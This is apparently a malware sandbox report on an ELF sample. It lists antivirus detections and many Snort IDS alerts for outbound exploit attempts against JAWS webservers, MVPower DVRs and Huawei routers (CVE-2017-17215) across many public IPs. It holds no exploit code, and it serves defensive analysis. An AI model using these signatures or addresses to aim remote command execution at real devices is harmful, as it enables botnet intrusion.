              SID:2030092
              Source Port:35958
              Destination Port:80
              Protocol:TCP
              Classtype:Web Application Attack
              Timestamp:06/10/24-15:38:00.206692
              SID:2829579
              Source Port:47676
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.260140
              SID:2835222
              Source Port:46142
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:02.508359
              SID:2829579
              Source Port:58330
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected
              Timestamp:06/10/24-15:38:00.247270
              SID:2835222
              Source Port:59752
              Destination Port:37215
              Protocol:TCP
              Classtype:A Network Trojan was detected

              Click to jump to signature section

              Show All Signature Results

              AV Detection

              barindex
              Source: s8y4CBbFHW.elfAvira: detected
              Source: s8y4CBbFHW.elfReversingLabs: Detection: 71%

              Networking

              barindex
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:37862 -> 203.54.242.166:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:32824 -> 70.109.71.255:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37862 -> 203.54.242.166:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:35674 -> 151.218.172.48:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:32824 -> 70.109.71.255:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:58648 -> 50.13.193.163:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35674 -> 151.218.172.48:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:53434 -> 70.156.171.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:43434 -> 57.244.132.164:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:58648 -> 50.13.193.163:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:35872 -> 194.55.24.22:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:53434 -> 70.156.171.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:50134 -> 102.230.19.253:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43434 -> 57.244.132.164:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:45956 -> 20.2.48.78:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35872 -> 194.55.24.22:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:60126 -> 88.157.63.21:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:50134 -> 102.230.19.253:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:39338 -> 193.5.227.125:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45956 -> 20.2.48.78:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:49156 -> 181.171.108.67:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60126 -> 88.157.63.21:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:54128 -> 115.56.153.54:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:39338 -> 193.5.227.125:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:59898 -> 213.227.25.210:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49156 -> 181.171.108.67:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:59220 -> 32.111.100.187:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:54128 -> 115.56.153.54:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:37506 -> 115.165.178.143:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59898 -> 213.227.25.210:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:39218 -> 9.203.151.161:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:59220 -> 32.111.100.187:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:40246 -> 96.121.230.115:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37506 -> 115.165.178.143:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:46042 -> 31.24.128.114:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:39218 -> 9.203.151.161:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:41002 -> 173.150.225.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40246 -> 96.121.230.115:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:52842 -> 181.232.47.252:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:46042 -> 31.24.128.114:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:37488 -> 86.102.128.211:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:41002 -> 173.150.225.180:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:39842 -> 13.159.171.238:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:52842 -> 181.232.47.252:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:42016 -> 195.50.200.227:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37488 -> 86.102.128.211:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:47840 -> 99.27.23.33:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:39842 -> 13.159.171.238:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:35958 -> 158.214.75.80:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:42016 -> 195.50.200.227:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:40556 -> 84.162.2.5:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:47840 -> 99.27.23.33:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:35328 -> 51.33.7.198:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35958 -> 158.214.75.80:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:54380 -> 167.251.162.140:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40556 -> 84.162.2.5:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:55620 -> 46.11.146.222:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35328 -> 51.33.7.198:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:53776 -> 78.199.201.121:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:54380 -> 167.251.162.140:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:40194 -> 111.31.234.213:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:55620 -> 46.11.146.222:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:48502 -> 145.193.92.118:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:53776 -> 78.199.201.121:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:34326 -> 161.147.107.200:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40194 -> 111.31.234.213:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:48068 -> 189.244.26.215:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:48502 -> 145.193.92.118:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:51382 -> 160.158.220.221:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34326 -> 161.147.107.200:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:35066 -> 74.221.113.140:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:48068 -> 189.244.26.215:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:53462 -> 220.219.206.99:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:51382 -> 160.158.220.221:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:51492 -> 154.68.192.29:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:35066 -> 74.221.113.140:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:40004 -> 184.225.110.223:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:53462 -> 220.219.206.99:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:34216 -> 39.251.150.235:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:51492 -> 154.68.192.29:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:33900 -> 37.242.196.25:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:40004 -> 184.225.110.223:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:49276 -> 219.24.143.221:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34216 -> 39.251.150.235:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:60926 -> 20.163.218.116:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:33900 -> 37.242.196.25:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:58522 -> 92.126.239.180:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49276 -> 219.24.143.221:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:49620 -> 161.106.196.70:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:60926 -> 20.163.218.116:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:45994 -> 120.127.248.215:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:58522 -> 92.126.239.180:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:49022 -> 80.246.211.214:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49620 -> 161.106.196.70:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:43560 -> 24.223.44.225:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:45994 -> 120.127.248.215:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:34410 -> 178.116.76.220:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49022 -> 80.246.211.214:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:56400 -> 76.87.100.69:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43560 -> 24.223.44.225:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:43590 -> 200.227.24.116:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:43232 -> 80.234.35.77:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:34410 -> 178.116.76.220:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:37108 -> 86.248.77.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:56400 -> 76.87.100.69:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:52018 -> 20.192.68.43:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43590 -> 200.227.24.116:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:49412 -> 64.204.248.79:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:43232 -> 80.234.35.77:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:42046 -> 195.209.166.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:56778 -> 124.198.230.56:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:37108 -> 86.248.77.229:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:52018 -> 20.192.68.43:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:39034 -> 152.83.224.204:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:49412 -> 64.204.248.79:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:52736 -> 96.171.224.255:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:42046 -> 195.209.166.102:80
              Source: TrafficSnort IDS: 2030092 ET TROJAN JAWS Webserver Unauthenticated Shell Command Execution 192.168.2.13:57824 -> 135.106.4.49:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:56778 -> 124.198.230.56:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:39034 -> 152.83.224.204:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:52736 -> 96.171.224.255:80
              Source: TrafficSnort IDS: 2025883 ET EXPLOIT MVPower DVR Shell UCE 192.168.2.13:57824 -> 135.106.4.49:80
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49110 -> 156.143.243.166:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49110 -> 156.143.243.166:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60882 -> 41.1.16.245:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60882 -> 41.1.16.245:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55322 -> 41.112.237.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55322 -> 41.112.237.34:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60470 -> 156.57.11.197:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60470 -> 156.57.11.197:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:44436 -> 156.190.41.183:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:44436 -> 156.190.41.183:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33064 -> 41.251.69.196:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33064 -> 41.251.69.196:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41114 -> 156.18.195.164:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41114 -> 156.18.195.164:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45682 -> 41.117.101.224:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45682 -> 41.117.101.224:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33796 -> 156.205.253.53:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33796 -> 156.205.253.53:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:32834 -> 156.249.70.243:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:32834 -> 156.249.70.243:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:37610 -> 156.89.39.231:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:37610 -> 156.89.39.231:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53100 -> 41.97.23.92:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53100 -> 41.97.23.92:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56460 -> 156.32.132.93:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56460 -> 156.32.132.93:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56378 -> 156.60.90.199:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56378 -> 156.60.90.199:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38508 -> 156.67.226.82:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38508 -> 156.67.226.82:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:47918 -> 197.192.210.171:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:47918 -> 197.192.210.171:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:51088 -> 156.185.143.113:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:51088 -> 156.185.143.113:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:45636 -> 197.11.121.199:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:45636 -> 197.11.121.199:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:56768 -> 41.92.127.129:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:56768 -> 41.92.127.129:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:49626 -> 197.53.161.229:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:49626 -> 197.53.161.229:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33514 -> 156.78.13.161:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33514 -> 156.78.13.161:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:41282 -> 156.97.36.34:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:41282 -> 156.97.36.34:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:55606 -> 197.142.203.17:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:55606 -> 197.142.203.17:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:34092 -> 41.30.124.178:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:34092 -> 41.30.124.178:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:60614 -> 156.10.20.117:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:60614 -> 156.10.20.117:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46644 -> 156.79.10.64:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46644 -> 156.79.10.64:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53768 -> 156.31.27.232:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53768 -> 156.31.27.232:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:33492 -> 197.125.224.191:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:33492 -> 197.125.224.191:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:53482 -> 156.82.1.213:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:53482 -> 156.82.1.213:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:39894 -> 197.56.205.250:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:39894 -> 197.56.205.250:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:46442 -> 156.98.83.218:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:46442 -> 156.98.83.218:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:42108 -> 197.215.149.213:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:42108 -> 197.215.149.213:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:59100 -> 156.216.173.116:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:59100 -> 156.216.173.116:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38960 -> 41.86.126.31:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38960 -> 41.86.126.31:37215
              Source: TrafficSnort IDS: 2835222 ETPRO EXPLOIT Huawei Remote Command Execution - Outbound (CVE-2017-17215) 192.168.2.13:38428 -> 197.123.58.130:37215
              Source: TrafficSnort IDS: 2829579 ETPRO EXPLOIT Huawei Remote Command Execution (CVE-2017-17215) 192.168.2.13:38428 -> 197.123.58.130:37215
